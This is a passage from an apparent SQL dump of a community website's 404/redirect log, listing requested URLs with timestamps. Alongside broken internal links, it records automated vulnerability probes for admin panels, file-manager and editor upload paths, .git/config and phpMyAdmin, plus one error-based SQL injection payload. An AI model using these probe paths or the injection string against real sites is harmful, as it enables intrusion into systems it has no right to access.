00:00:00'),(1532,'http://hallcrestheights.org/community/%22http://www.mcleanvfd.org/%22','','','',1,0,'2015-12-17 04:50:55','0000-00-00 00:00:00'),(1533,'http://hallcrestheights.org/association/%22http://maps.google.com/maps/place?cid=10679457874143768481&q=golf+course+mclean+va&gl=us&hl=en&cd=1&cad=src:pplink&ei=lTyOTJvVKaDeygT1pqTdDw%22','','','',1,0,'2015-12-17 04:51:01','0000-00-00 00:00:00'),(1534,'http://hallcrestheights.org/community/%22http://www.fairsandfestivals.net/states/va%22','','','',1,0,'2015-12-17 04:51:02','0000-00-00 00:00:00'),(1535,'http://hallcrestheights.org/association/%22http://maps.google.com/maps/place?cid=16159567338290573666&q=worship+mclean+va&gl=us&hl=en&cd=10&cad=src:pplink&ei=0jqOTJv0G5uuzASfm5GIAQ%22','','','',1,0,'2015-12-17 04:51:11','0000-00-00 00:00:00'),(1536,'http://hallcrestheights.org/association/%22http://www.dominionhospital.com/%22','','','',1,0,'2015-12-17 04:51:14','0000-00-00 00:00:00'),(1537,'http://hallcrestheights.org/association/%22http://maps.google.com/maps/place?cid=5727665263910949534&q=library+mclean+va&gl=us&hl=en&cd=1&cad=src:pplink&ei=kz2OTK7CK5fUzATu7_BR%22','','','',1,0,'2015-12-17 04:51:15','0000-00-00 00:00:00'),(1538,'http://hallcrestheights.org/association/%22http://maps.google.com/maps/place?cid=7371646531160565994&q=worship+mclean+va&gl=us&hl=en&cd=2&cad=src:pplink&ei=0jqOTJv0G5uuzASfm5GIAQ%22','','','',1,0,'2015-12-17 04:51:21','0000-00-00 00:00:00'),(1539,'http://hallcrestheights.org/association/%22mailto:mmholshey@verizon.net%22%3Emmholshey@verizon.net%3C/a%3E%3C/span%3E.%3C/p%3E%3C/div%3E%3C/content','','','',1,0,'2015-12-17 04:51:23','0000-00-00 00:00:00'),(1540,'http://hallcrestheights.org/association/%22http://maps.google.com/maps/place?cid=12610779283999867771&q=worship+mclean+va&gl=us&hl=en&cd=8&cad=src:pplink&ei=0jqOTJv0G5uuzASfm5GIAQ%22','','','',1,0,'2015-12-17 04:51:25','0000-00-00 00:00:00'),(1541,'http://hallcrestheights.org/community/%22http://maps.google.com/maps/place?cid=14572696815429026639&q=mclean+bible+church&gl=us&hl=en&cd=1&cad=src:pplink&ei=imGOTNlulvzIBdWK8T8%22','','','',1,0,'2015-12-17 04:51:26','0000-00-00 00:00:00'),(1542,'http://hallcrestheights.org/association/%22http://www.fxva.com/our-community/great-falls-mclean/attractions/%22','','','',1,0,'2015-12-17 04:51:27','0000-00-00 00:00:00'),(1543,'http://hallcrestheights.org/association/%22http://www.fairsandfestivals.net/states/va%22','','','',1,0,'2015-12-17 04:51:30','0000-00-00 00:00:00'),(1544,'http://hallcrestheights.org/association/%22http://maps.google.com/maps/place?cid=233013739269591554&q=worship+mclean+va&gl=us&hl=en&cd=4&cad=src:pplink&ei=0jqOTJv0G5uuzASfm5GIAQ%22','','','',1,0,'2015-12-17 04:51:31','0000-00-00 00:00:00'),(1545,'http://hallcrestheights.org/association/%22http://maps.google.com/maps/place?cid=13268019156489289482&q=worship+mclean+va&gl=us&hl=en&cd=5&cad=src:pplink&ei=0jqOTJv0G5uuzASfm5GIAQ%22','','','',1,0,'2015-12-17 04:51:32','0000-00-00 00:00:00'),(1546,'http://hallcrestheights.org/community/%22http://maps.google.com/maps/place?cid=233013739269591554&q=worship+mclean+va&gl=us&hl=en&cd=4&cad=src:pplink&ei=0jqOTJv0G5uuzASfm5GIAQ%22','','','',1,0,'2015-12-17 04:51:34','0000-00-00 00:00:00'),(1547,'http://hallcrestheights.org/community/%22http://maps.google.com/maps?q=Lewinsville+Presbyterian+Church+1724+Chain+Bridge+Rd.,+McLean,+VA&hl=en&ll=38.92982,-77.197194&spn=0.009882,0.01929&sll=38.929849,-77.196959&sspn=0.009882,0.01929&hq=Lewinsville+Presby','','','',1,0,'2015-12-17 04:51:35','0000-00-00 00:00:00'),(1548,'http://hallcrestheights.org/community/%22http://maps.google.com/maps/place?cid=5727665263910949534&q=library+mclean+va&gl=us&hl=en&cd=1&cad=src:pplink&ei=kz2OTK7CK5fUzATu7_BR%22','','','',1,0,'2015-12-17 04:51:37','0000-00-00 00:00:00'),(1549,'http://hallcrestheights.org/community/%22http://maps.google.com/maps/place?cid=7422004494754812582&q=golf+course+mclean+va&gl=us&hl=en&cd=4&cad=src:pplink&ei=lTyOTJvVKaDeygT1pqTdDw%22','','','',1,0,'2015-12-17 04:51:38','0000-00-00 00:00:00'),(1550,'http://hallcrestheights.org/association/%22http://maps.google.com/maps/place?cid=85250331542849852&q=worship+mclean+va&gl=us&hl=en&cd=7&cad=src:pplink&ei=0jqOTJv0G5uuzASfm5GIAQ%22','','','',1,0,'2015-12-17 04:51:39','0000-00-00 00:00:00'),(1551,'http://hallcrestheights.org/association/%22http://maps.google.com/maps/place?cid=1759044803688883523&q=worship+mclean+va&gl=us&hl=en&cd=1&cad=src:pplink&ei=0jqOTJv0G5uuzASfm5GIAQ%22','','','',1,0,'2015-12-17 04:51:42','0000-00-00 00:00:00'),(1552,'http://hallcrestheights.org/community/%22http://maps.google.com/maps/place?cid=10714615803695944558&q=worship+mclean+va&gl=us&hl=en&cd=9&cad=src:pplink&ei=0jqOTJv0G5uuzASfm5GIAQ%22','','','',1,0,'2015-12-17 04:51:46','0000-00-00 00:00:00'),(1553,'http://hallcrestheights.org/association/%22http://maps.google.com/maps/place?cid=7422004494754812582&q=golf+course+mclean+va&gl=us&hl=en&cd=4&cad=src:pplink&ei=lTyOTJvVKaDeygT1pqTdDw%22','','','',1,0,'2015-12-17 04:51:47','0000-00-00 00:00:00'),(1554,'http://hallcrestheights.org/association/%22http://www.wmata.com/%22','','','',1,0,'2015-12-17 04:51:48','0000-00-00 00:00:00'),(1555,'http://hallcrestheights.org/community/%22http://maps.google.com/maps/place?cid=13268019156489289482&q=worship+mclean+va&gl=us&hl=en&cd=5&cad=src:pplink&ei=0jqOTJv0G5uuzASfm5GIAQ%22','','','',1,0,'2015-12-17 04:51:51','0000-00-00 00:00:00'),(1556,'http://hallcrestheights.org/association/%22http://maps.google.com/maps/place?cid=10714615803695944558&q=worship+mclean+va&gl=us&hl=en&cd=9&cad=src:pplink&ei=0jqOTJv0G5uuzASfm5GIAQ%22','','','',1,0,'2015-12-17 04:51:52','0000-00-00 00:00:00'),(1557,'http://hallcrestheights.org/community/%22http://www.dominionhospital.com/%22','','','',1,0,'2015-12-17 04:51:53','0000-00-00 00:00:00'),(1558,'http://hallcrestheights.org/association/%22mailto:mmholshey@verizon.net%22%3Emmholshey@verizon.net%3C/a%3E%3C/span%3E.%3C/p%3E%3C/div%3E%3C/summary','','','',1,0,'2015-12-17 04:51:57','0000-00-00 00:00:00'),(1559,'http://hallcrestheights.org/association/%22http://maps.google.com/maps/place?cid=15367465136288273312&q=worship+mclean+va&gl=us&hl=en&cd=3&cad=src:pplink&ei=0jqOTJv0G5uuzASfm5GIAQ%22','','','',1,0,'2015-12-17 04:52:00','0000-00-00 00:00:00'),(1560,'http://hallcrestheights.org/community/%22mailto:mmholshey@verizon.net%22%3Emmholshey@verizon.net%3C/a%3E%3C/span%3E.%3C/p%3E%3C/div%3E%3C/summary','','','',1,0,'2015-12-17 04:52:01','0000-00-00 00:00:00'),(1561,'http://hallcrestheights.org/community/%22http://www.virginiahospitalcenter.com/%22','','','',1,0,'2015-12-17 04:52:03','0000-00-00 00:00:00'),(1562,'http://hallcrestheights.org/association/%22http://www.mcleanvfd.org/%22','','','',1,0,'2015-12-17 04:52:05','0000-00-00 00:00:00'),(1563,'http://hallcrestheights.org/community/%22http://maps.google.com/maps/place?cid=10737563807815193592&q=worship+mclean+va&gl=us&hl=en&cd=6&cad=src:pplink&ei=0jqOTJv0G5uuzASfm5GIAQ%22','','','',1,0,'2015-12-17 04:52:06','0000-00-00 00:00:00'),(1564,'http://hallcrestheights.org/association/%22http://maps.google.com/maps/place?cid=13630486973872196781&q=synagogues+mclean+va&gl=us&hl=en&cd=3&cad=src:pplink&ei=nDuOTMboM6qwywS7ppgI%22','','','',1,0,'2015-12-17 08:40:58','0000-00-00 00:00:00'),(1565,'http://hallcrestheights.org/community/%22http://maps.google.com/maps/place?cid=10679457874143768481&q=golf+course+mclean+va&gl=us&hl=en&cd=1&cad=src:pplink&ei=lTyOTJvVKaDeygT1pqTdDw%22','','','',1,0,'2015-12-17 08:40:59','0000-00-00 00:00:00'),(1566,'http://hallcrestheights.org/association/%22http://maps.google.com/maps/place?cid=14572696815429026639&q=mclean+bible+church&gl=us&hl=en&cd=1&cad=src:pplink&ei=imGOTNlulvzIBdWK8T8%22','','','',1,0,'2015-12-17 08:41:00','0000-00-00 00:00:00'),(1567,'http://hallcrestheights.org/association/%22http://maps.google.com/maps/place?cid=10199218883031317261&q=Westwood+Country+Club,+Vienna,+VA&gl=us&hl=en&cd=1&cad=src:pplink&ei=Zj2OTOaKD5fUzATu7_BR%22','','','',1,0,'2015-12-17 08:41:01','0000-00-00 00:00:00'),(1568,'http://hallcrestheights.org/association/%22http://maps.google.com/maps/place?cid=10737563807815193592&q=worship+mclean+va&gl=us&hl=en&cd=6&cad=src:pplink&ei=0jqOTJv0G5uuzASfm5GIAQ%22','','','',1,0,'2015-12-17 08:41:02','0000-00-00 00:00:00'),(1569,'http://hallcrestheights.org/community/%22http://www.wmata.com/%22','','','',1,0,'2015-12-17 08:41:03','0000-00-00 00:00:00'),(1570,'http://hallcrestheights.org/community/%22mailto:mmholshey@verizon.net%22%3Emmholshey@verizon.net%3C/a%3E%3C/span%3E.%3C/p%3E%3C/div%3E%3C/content','','','',1,0,'2015-12-17 08:41:07','0000-00-00 00:00:00'),(1571,'http://hallcrestheights.org/association/%22http://www.virginiahospitalcenter.com/%22','','','',1,0,'2015-12-17 08:41:08','0000-00-00 00:00:00'),(1572,'http://hallcrestheights.org/association/%22http://maps.google.com/maps?q=Lewinsville+Presbyterian+Church+1724+Chain+Bridge+Rd.,+McLean,+VA&hl=en&ll=38.92982,-77.197194&spn=0.009882,0.01929&sll=38.929849,-77.196959&sspn=0.009882,0.01929&hq=Lewinsville+Pres','','','',1,0,'2015-12-17 08:41:10','0000-00-00 00:00:00'),(1573,'http://hallcrestheights.org/community/%22http://www.fxva.com/our-community/great-falls-mclean/attractions/%22','','','',1,0,'2015-12-17 08:41:11','0000-00-00 00:00:00'),(1574,'http://hallcrestheights.org/kp.html','','','',1,0,'2016-01-01 03:17:02','0000-00-00 00:00:00'),(1575,'http://www.hallcrestheights.org/components/com_creativecontactform/fileupload/index.php','','','',1,0,'2016-01-13 12:55:17','0000-00-00 00:00:00'),(1576,'http://www.hallcrestheights.org/sites/default/files/tmp/','','','',1,0,'2016-01-13 12:55:22','0000-00-00 00:00:00'),(1577,'http://hallcrestheights.org/module/fckeditor/editor/','','','',1,0,'2016-01-14 20:17:25','0000-00-00 00:00:00'),(1578,'http://hallcrestheights.org/alfa.html','','','',1,0,'2016-01-20 14:29:49','0000-00-00 00:00:00'),(1579,'http://hallcrestheights.org/%20index.php','','','',1,0,'2016-01-21 03:43:48','0000-00-00 00:00:00'),(1580,'http://hallcrestheights.org/index.jsp/','','','',1,0,'2016-02-05 08:15:03','0000-00-00 00:00:00'),(1581,'http://hallcrestheights.org/admin/Cms_Wysiwyg/directive/index/','','','',1,0,'2016-02-11 09:05:40','0000-00-00 00:00:00'),(1582,'http://hallcrestheights.orghttp//hallcrestheights.org/','','','',1,0,'2016-02-15 09:40:53','0000-00-00 00:00:00'),(1583,'http://hallcrestheights.org/components/com_jce/views/index.php','','http://hallcrestheights.org/components/com_jce/views/index.php','',2,0,'2016-02-27 17:37:50','0000-00-00 00:00:00'),(1584,'http://hallcrestheights.org/components/com_content/models/index.php','','http://hallcrestheights.org/components/com_content/models/index.php','',4,0,'2016-02-27 17:37:51','0000-00-00 00:00:00'),(1585,'http://hallcrestheights.org/%EF%BF%BD+%1B%03?o=3&g=&s=&z=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%07?','','http://hallcrestheights.org/','',1,0,'2016-03-01 15:16:52','0000-00-00 00:00:00'),(1586,'http://hallcrestheights.org/joomla/administrator/index.php','','','',2,0,'2016-03-03 00:32:42','0000-00-00 00:00:00'),(1587,'http://hallcrestheights.org/joomla/index.php','','','',1,0,'2016-03-03 00:32:42','0000-00-00 00:00:00'),(1588,'http://www.hallcrestheights.org/user/','','','',7,0,'2016-03-05 14:51:40','0000-00-00 00:00:00'),(1589,'http://www.hallcrestheights.org/magento_version','','','',1,0,'2016-03-07 09:01:46','0000-00-00 00:00:00'),(1590,'http://hallcrestheights.org/magento_version','','','',1,0,'2016-03-07 09:01:47','0000-00-00 00:00:00'),(1591,'http://www.hallcrestheights.orghttp//www.hallcrestheights.org/2-uncategorised.html/trackback/','','http://www.hallcrestheights.org/2-uncategorised.html?start=8','',1,0,'2016-03-16 11:11:00','0000-00-00 00:00:00'),(1592,'https://www.hallcrestheights.org/apple-app-site-association','','','',66,0,'2016-03-19 04:26:20','0000-00-00 00:00:00'),(1593,'http://www.hallcrestheights.org/readme.html','','http://www.hallcrestheights.org/readme.html','',2,0,'2016-03-23 15:17:15','0000-00-00 00:00:00'),(1594,'http://hallcrestheights.org/language/en-GB/en-GB.xmlindex.php','','http://hallcrestheights.org/language/en-GB/en-GB.xmlindex.php','',1,0,'2016-04-01 11:33:44','0000-00-00 00:00:00'),(1595,'http://hallcrestheights.org/association/board-members.html/trackback/','','http://hallcrestheights.org/association/board-members.html','',1,0,'2016-04-06 02:56:10','0000-00-00 00:00:00'),(1596,'http://hallcrestheights.org/cache/index.php?mod=in','','http://hallcrestheights.org/cache/index.php?mod=in','',1,0,'2016-04-06 22:13:41','0000-00-00 00:00:00'),(1597,'http://0375e0c.netsolhost.com/joomla/administrator/','','','',1,0,'2016-04-19 03:05:51','0000-00-00 00:00:00'),(1598,'http://hallcrestheights.org/downloader/','','http://hallcrestheights.org/downloader/','',3,0,'2016-04-19 09:40:46','0000-00-00 00:00:00'),(1599,'http://hallcrestheights.org/contaeect/','','','',1,0,'2016-05-11 10:06:14','0000-00-00 00:00:00'),(1600,'https://www.hallcrestheights.org/.well-known/apple-app-site-association','','','',64,0,'2016-05-17 12:47:48','0000-00-00 00:00:00'),(1601,'http://www.hallcrestheights.org/elfinder/elfinder.html','','','',1,0,'2016-05-29 16:02:23','0000-00-00 00:00:00'),(1602,'http://www.hallcrestheights.org/elfinder.html','','','',1,0,'2016-05-29 16:02:23','0000-00-00 00:00:00'),(1603,'http://www.hallcrestheights.org/includes/elfinder/elfinder.html','','','',1,0,'2016-05-29 16:02:24','0000-00-00 00:00:00'),(1604,'http://www.hallcrestheights.org/fckeditor/elFinder/elfinder.html','','','',1,0,'2016-05-29 16:02:25','0000-00-00 00:00:00'),(1605,'http://www.hallcrestheights.org/admin/elfinder/elfinder.html','','','',1,0,'2016-05-29 16:02:25','0000-00-00 00:00:00'),(1606,'http://www.hallcrestheights.org/assets/elfinder/elfinder.html','','','',1,0,'2016-05-29 16:02:25','0000-00-00 00:00:00'),(1607,'http://www.hallcrestheights.org/library/elfinder/elfinder.html','','','',1,0,'2016-05-29 16:02:26','0000-00-00 00:00:00'),(1608,'http://www.hallcrestheights.org/lib/elfinder/elfinder.html','','','',1,0,'2016-05-29 16:02:26','0000-00-00 00:00:00'),(1609,'http://www.hallcrestheights.org/jscripts/elfinder/elfinder.html','','','',1,0,'2016-05-29 16:02:26','0000-00-00 00:00:00'),(1610,'http://www.hallcrestheights.org/assets/plugins/elfinder/elfinder.html','','','',1,0,'2016-05-29 16:02:27','0000-00-00 00:00:00'),(1611,'http://hallcrestheights.org/qpwoeifchgvbxskfgueoxmzz','','','',1,0,'2016-06-17 12:06:05','0000-00-00 00:00:00'),(1612,'http://hallcrestheights.org/index.php/superadmin/','','','',1,0,'2016-06-23 09:30:58','0000-00-00 00:00:00'),(1613,'http://hallcrestheights.org/index.php/admin123/','','','',1,0,'2016-06-23 09:31:01','0000-00-00 00:00:00'),(1614,'http://hallcrestheights.org/index.php/shop/','','','',1,0,'2016-06-23 09:31:02','0000-00-00 00:00:00'),(1615,'http://hallcrestheights.org/index.php/myadmin/','','','',1,0,'2016-06-23 09:31:04','0000-00-00 00:00:00'),(1616,'http://www.hallcrestheights.org/title.html','','','',1,0,'2016-06-26 13:54:10','0000-00-00 00:00:00'),(1617,'http://hallcrestheights.org//mw.html','','','',1,0,'2016-07-10 15:23:03','0000-00-00 00:00:00'),(1618,'http://hallcrestheights.org/sys-cgi','','','',1,0,'2016-07-12 11:44:10','0000-00-00 00:00:00'),(1619,'http://www.hallcrestheights.org/webroot/plugins/elfinder/elfinder.html','','','',1,0,'2016-07-20 14:29:09','0000-00-00 00:00:00'),(1620,'http://www.hallcrestheights.org/ext/elFinder/elfinder.html','','','',1,0,'2016-07-20 14:29:10','0000-00-00 00:00:00'),(1621,'http://www.hallcrestheights.org/vendor/elfinder/elfinder.html','','','',1,0,'2016-07-20 14:29:10','0000-00-00 00:00:00'),(1622,'http://www.hallcrestheights.org/js/lib/elfinder/elfinder.html','','','',1,0,'2016-07-20 14:29:11','0000-00-00 00:00:00'),(1623,'http://www.hallcrestheights.org/Public/static/elfinder/elfinder.html','','','',1,0,'2016-07-20 14:29:11','0000-00-00 00:00:00'),(1624,'http://www.hallcrestheights.org/webszerk/elfinder/elfinder.html','','','',1,0,'2016-07-20 14:29:12','0000-00-00 00:00:00'),(1625,'http://hallcrestheights.org/.git/config','','','',1,0,'2016-07-22 13:08:00','0000-00-00 00:00:00'),(1626,'http://hallcrestheights.org/user/register','','','',2,0,'2016-07-27 21:02:42','0000-00-00 00:00:00'),(1627,'http://hallcrestheights.org/wpindex.php','','','',1,0,'2016-08-02 14:47:49','0000-00-00 00:00:00'),(1628,'http://hallcrestheights.org/typo3/','','','',5,0,'2016-08-24 04:36:08','0000-00-00 00:00:00'),(1629,'http://hallcrestheights.org/index.php/admin','','','',5,0,'2016-08-24 04:36:09','0000-00-00 00:00:00'),(1630,'http://hallcrestheights.org/components/index.php','','http://hallcrestheights.org/components/index.php','',2,0,'2016-08-29 07:13:16','0000-00-00 00:00:00'),(1631,'http://hallcrestheights.org/templates/ja_purity/index.php','','http://hallcrestheights.org/templates/ja_purity/index.php','',6,0,'2016-08-29 07:15:34','0000-00-00 00:00:00'),(1632,'http://hallcrestheights.org/components/com_content/views/index.php','','http://hallcrestheights.org/components/com_content/views/index.php','',2,0,'2016-08-31 04:46:50','0000-00-00 00:00:00'),(1633,'http://hallcrestheights.org/components/com_contact/views/index.php','','http://hallcrestheights.org/components/com_contact/views/index.php','',2,0,'2016-08-31 04:46:51','0000-00-00 00:00:00'),(1634,'http://hallcrestheights.org/images/index.php','','http://hallcrestheights.org/images/index.php','',6,0,'2016-08-31 04:46:56','0000-00-00 00:00:00'),(1635,'http://hallcrestheights.org/components/com_weblinks/models/index.php','','http://hallcrestheights.org/components/com_weblinks/models/index.php','',3,0,'2016-08-31 04:46:57','0000-00-00 00:00:00'),(1636,'http://www.hallcrestheights.org/uteplist/plugins/TinyMCEPlugin/elfinder/elfinder.html','','','',1,0,'2016-09-01 06:57:47','0000-00-00 00:00:00'),(1637,'http://www.hallcrestheights.org/admin/scripts/elfinder-2.0-rc1/elfinder.html','','','',1,0,'2016-09-01 06:57:48','0000-00-00 00:00:00'),(1638,'http://www.hallcrestheights.org/archi/archi/vendor/barryvdh/elfinder-builds/elfinder.html','','','',1,0,'2016-09-01 06:57:48','0000-00-00 00:00:00'),(1639,'http://www.hallcrestheights.org/public/thirdParty/elfinder-ckeditor/elfinder.html','','','',1,0,'2016-09-01 06:57:49','0000-00-00 00:00:00'),(1640,'http://www.hallcrestheights.org/tcsts/tcelf/elfinder.html','','','',1,0,'2016-09-01 06:57:49','0000-00-00 00:00:00'),(1641,'http://www.hallcrestheights.org/zabbix/','','','',1,0,'2016-09-14 15:03:16','0000-00-00 00:00:00'),(1642,'http://hallcrestheights.org/web/administrator/index.php','','','',1,0,'2016-09-15 08:16:40','0000-00-00 00:00:00'),(1643,'http://hallcrestheights.org/www/administrator/index.php','','','',1,0,'2016-09-15 08:16:42','0000-00-00 00:00:00'),(1644,'http://hallcrestheights.org/blogs/administrator/index.php','','','',1,0,'2016-09-15 08:16:43','0000-00-00 00:00:00'),(1645,'http://hallcrestheights.org/login/','','','',1,0,'2016-09-15 08:16:45','0000-00-00 00:00:00'),(1646,'http://hallcrestheights.org/cart','','','',1,0,'2016-09-15 18:59:21','0000-00-00 00:00:00'),(1647,'http://hallcrestheights.org/components/com_mailto/views/index.php','','http://hallcrestheights.org/components/com_mailto/views/index.php','',2,0,'2016-09-20 15:19:20','0000-00-00 00:00:00'),(1648,'http://hallcrestheights.org/components/com_poll/views/index.php','','http://hallcrestheights.org/components/com_poll/views/index.php','',1,0,'2016-09-20 15:19:53','0000-00-00 00:00:00'),(1649,'http://hallcrestheights.org/components/com_finder/views/index.php','','http://hallcrestheights.org/components/com_finder/views/index.php','',1,0,'2016-09-20 15:19:54','0000-00-00 00:00:00'),(1650,'http://hallcrestheights.org/templates/rhuk_milkyway/index.php','','http://hallcrestheights.org/templates/rhuk_milkyway/index.php','',6,0,'2016-09-20 15:22:28','0000-00-00 00:00:00'),(1651,'http://hallcrestheights.org/modules/mod_ariimageslider','','http://hallcrestheights.org/modules/mod_ariimageslider','',1,0,'2016-09-20 15:42:01','0000-00-00 00:00:00'),(1652,'http://www.hallcrestheights.org/excursions/js/plugins/elfinder2.0/elfinder.html','','','',1,0,'2016-10-01 01:40:44','0000-00-00 00:00:00'),(1653,'http://www.hallcrestheights.org/assets/b845e0c8/elfinder/elfinder.html','','','',1,0,'2016-10-01 01:40:44','0000-00-00 00:00:00'),(1654,'http://www.hallcrestheights.org/assets/dashboard/js/elrte-1.3/elfinder/elfinder.html','','','',1,0,'2016-10-01 01:40:45','0000-00-00 00:00:00'),(1655,'http://www.hallcrestheights.org/vendor/mihaildev/yii2-elfinder/assets/elfinder.html','','','',1,0,'2016-10-01 01:40:45','0000-00-00 00:00:00'),(1656,'http://www.hallcrestheights.org/common/js/elfinder-2.0-rc1/elfinder.html','','','',1,0,'2016-10-01 01:40:45','0000-00-00 00:00:00'),(1657,'http://www.hallcrestheights.org/media/system/js/in%20a?a.htmlFor=b:a.setAttribute(','','','',1,0,'2016-10-09 15:36:15','0000-00-00 00:00:00'),(1658,'http://www.hallcrestheights.org/media/system/js/in%20this?this.htmlFor:this.getAttribute(','','','',1,0,'2016-10-09 15:36:16','0000-00-00 00:00:00'),(1659,'http://hallcrestheights.org/admin/content/sitetree','','','',1,0,'2016-10-10 18:02:46','0000-00-00 00:00:00'),(1660,'http://hallcrestheights.org/panel','','','',1,0,'2016-10-10 18:03:07','0000-00-00 00:00:00'),(1661,'http://hallcrestheights.org/bitrix/admin','','','',1,0,'2016-10-10 18:22:12','0000-00-00 00:00:00'),(1662,'http://hallcrestheights.org/manager','','','',1,0,'2016-10-10 18:22:13','0000-00-00 00:00:00'),(1663,'http://hallcrestheights.org/n.html','','','',1,0,'2016-10-17 09:34:54','0000-00-00 00:00:00'),(1664,'http://hallcrestheights.org/index.php/author-login','','','',1,0,'2016-10-28 03:04:36','0000-00-00 00:00:00'),(1665,'http://www.hallcrestheights.org/~daycare/assets/elfinder/elfinder.html','','','',1,0,'2016-10-29 09:00:49','0000-00-00 00:00:00'),(1666,'http://www.hallcrestheights.org/_core/utils/elfinder/elfinder.html','','','',1,0,'2016-10-29 09:00:49','0000-00-00 00:00:00'),(1667,'http://www.hallcrestheights.org/packages/ahmadazimi/laravel-media-manager/elfinder.html','','','',1,0,'2016-10-29 09:00:50','0000-00-00 00:00:00'),(1668,'http://www.hallcrestheights.org/modules/tadtools/ckeditor/elFinder/elfinder.html','','','',1,0,'2016-10-29 09:00:50','0000-00-00 00:00:00'),(1669,'http://www.hallcrestheights.org/common/js/elfinder_2.0/elfinder.html','','','',1,0,'2016-10-29 09:00:51','0000-00-00 00:00:00'),(1670,'http://hallcrestheights.org/javascript/fckeditor/editor/','','','',1,0,'2016-11-01 20:45:27','0000-00-00 00:00:00'),(1671,'http://hallcrestheights.org/inc/editors/fckeditor/editor/','','','',1,0,'2016-11-01 20:45:27','0000-00-00 00:00:00'),(1672,'http://hallcrestheights.org/scripts/editor/editor/','','','',1,0,'2016-11-01 20:45:27','0000-00-00 00:00:00'),(1673,'http://hallcrestheights.org/javascript/editors/fckeditor/editor/','','','',1,0,'2016-11-01 20:45:27','0000-00-00 00:00:00'),(1674,'http://hallcrestheights.org/plugins/fckeditor/editor/','','','',1,0,'2016-11-01 20:45:29','0000-00-00 00:00:00'),(1675,'http://hallcrestheights.org/support/editor/editor/','','','',1,0,'2016-11-01 20:45:29','0000-00-00 00:00:00'),(1676,'http://hallcrestheights.org/data/fckeditor/editor/','','','',1,0,'2016-11-01 20:45:29','0000-00-00 00:00:00'),(1677,'http://hallcrestheights.org/library/fckeditor/editor/','','','',1,0,'2016-11-01 20:45:29','0000-00-00 00:00:00'),(1678,'http://hallcrestheights.org/plugins/editor/editor/','','','',1,0,'2016-11-01 20:45:29','0000-00-00 00:00:00'),(1679,'http://hallcrestheights.org/support/fckeditor/editor/','','','',1,0,'2016-11-01 20:45:29','0000-00-00 00:00:00'),(1680,'http://hallcrestheights.org/templates/fckeditor/editor/','','','',1,0,'2016-11-01 20:45:30','0000-00-00 00:00:00'),(1681,'http://hallcrestheights.org/system/editor/editor/','','','',1,0,'2016-11-01 20:45:30','0000-00-00 00:00:00'),(1682,'http://hallcrestheights.org/manage/editor/editor/','','','',1,0,'2016-11-01 20:45:30','0000-00-00 00:00:00'),(1683,'http://hallcrestheights.org/html/js/editor/fckeditor/editor/','','','',1,0,'2016-11-01 20:45:30','0000-00-00 00:00:00'),(1684,'http://hallcrestheights.org/admin/editor/editor/','','','',1,0,'2016-11-01 20:45:31','0000-00-00 00:00:00'),(1685,'http://hallcrestheights.org/outils/editor/editor/','','','',1,0,'2016-11-01 20:45:31','0000-00-00 00:00:00'),(1686,'http://hallcrestheights.org/administartors/fckeditor/editor/','','','',1,0,'2016-11-01 20:45:35','0000-00-00 00:00:00'),(1687,'http://hallcrestheights.org/lib/editor/editor/','','','',1,0,'2016-11-01 20:45:36','0000-00-00 00:00:00'),(1688,'http://hallcrestheights.org/wp-includes/','','http://hallcrestheights.org/wp-includes/','',1,0,'2016-11-05 16:52:47','0000-00-00 00:00:00'),(1689,'http://hallcrestheights.org/phpmyadmin/index.php','','','',1,0,'2016-11-11 22:24:23','0000-00-00 00:00:00'),(1690,'http://hallcrestheights.org/myadmin/index.php','','','',1,0,'2016-11-11 22:24:25','0000-00-00 00:00:00'),(1691,'http://www.hallcrestheights.org/lib/elfinder/build/elfinder.html','','','',1,0,'2016-11-29 02:22:16','0000-00-00 00:00:00'),(1692,'http://www.hallcrestheights.org/market/elfinder.html','','','',1,0,'2016-11-29 02:22:28','0000-00-00 00:00:00'),(1693,'http://www.hallcrestheights.org/career/elfinder.html','','','',1,0,'2016-11-29 02:22:30','0000-00-00 00:00:00'),(1694,'http://www.hallcrestheights.org/news/elfinder.html','','','',1,0,'2016-11-29 02:22:31','0000-00-00 00:00:00'),(1695,'http://www.hallcrestheights.org/elfinder1/elfinder.html','','','',1,0,'2016-11-29 02:22:32','0000-00-00 00:00:00'),(1696,'http://hallcrestheights.org/uba.html','','','',1,0,'2016-12-04 12:37:28','0000-00-00 00:00:00'),(1697,'http://www.hallcrestheights.org/sys-cgi','','','',1,0,'2016-12-06 04:10:26','0000-00-00 00:00:00'),(1698,'http://www.hallcrestheights.org/wp-admin','','','',3,0,'2016-12-08 22:43:30','0000-00-00 00:00:00'),(1699,'http://www.hallcrestheights.org/test-for-404-page','','','',1,0,'2016-12-08 22:43:35','0000-00-00 00:00:00'),(1700,'http://hallcrestheights.org/uofqvhtp','','','',1,0,'2016-12-15 06:50:53','0000-00-00 00:00:00'),(1701,'http://www.hallcrestheights.org/admin/','','','',8,0,'2016-12-19 21:15:46','0000-00-00 00:00:00'),(1702,'http://hallcrestheights.org/:80/index.php?Itemid=48&lang=\'and(select 1 from(select count(),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(81),CHAR(54),CHAR(114),CHAR(89),CHAR(102),CHAR(118),CHAR(111),CHAR(100)) from information_schema.tables limit','','http://hallcrestheights.org:80/:80/index.php?Itemid=48&lang=\'and(select%201%20from(select%20count()%2cconcat((select%20concat(CHAR(52)%2cCHAR(67)%2cCH','',1,0,'2016-12-31 23:17:23','0000-00-00 00:00:00'),(1703,'http://www.hallcrestheights.org/survey.html','','','',34,0,'2017-01-01 06:33:16','0000-00-00 00:00:00'),(1704,'http://hallcrestheights.org/','','','',7,0,'2017-01-01 20:31:03','0000-00-00 00:00:00'),(1705,'http://hallcrestheights.org/FallaGassrini/E','','','',1,0,'2017-01-03 02:17:25','0000-00-00 00:00:00'),(1706,'http://hallcrestheights.org/installation/index.php',NULL,'http://hallcrestheights.org/installation/index.php','',9,0,'2017-01-05 22:25:47','0000-00-00 00:00:00'),(1707,'http://www.hallcrestheights.org/xhajvq-k15849-lwczbiqs-osqx-oqkgq-aqyd-i20162629-cptznzv-tjqoevp-caqwj/',NULL,'','',1,0,'2017-01-05 22:29:52','0000-00-00 00:00:00'),(1708,'http://www.hallcrestheights.org/mrcqgbei-fuwgr-abtnwyrq-i20162631-semgwko-whme-mxgku-cybnpz-kicv-k50420-ejxkulzj-cjkntsxj-lnuuuv-tffcgy.htm',NULL,'','',1,0,'2017-01-05 22:32:06','0000-00-00 